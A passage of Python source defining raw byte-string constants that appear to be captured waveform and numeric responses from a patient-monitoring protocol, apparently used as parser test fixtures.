b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ b"\x08\x4c\x08\x99\x08\xe4\x09\x2f\x09\x78\x09\xbf\x0a\x03\x0a\x44" \ b"\x0a\x83" rsp_wave_5_no_3 = \ 
b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x10\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ b"\x20\x5f\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0a\xbd\x0a\xf3\x0b\x25\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd" \ 
b"\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5" \ b"\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0" \ b"\x0a\x9d\x0a\x68\x0a\x31\x09\xf9\x09\xbf\x09\x85\x09\x4b\x09\x10" \ b"\x08\xd7" rsp_wave_5_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x18\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x33\x20\x30" \ b"\x20\x30\x20\x2d\x20\x2a\x20\x28\x20\x26\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ 
b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x77\x20\x75" \ b"\x20\x6d\x20\x67\x20\x61\x20\x59\x20\x51\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ 
b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_nu_6_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ 
b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ 
b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_6_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ 
b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_6_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ 
b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_6_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x46\x00\x04\x00\x07\x04\x40\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x36\x00\x03\x00\x00\x0e\x80\x20\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x1c\x00\x00\x00\x04" \ b"\x04\x16\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 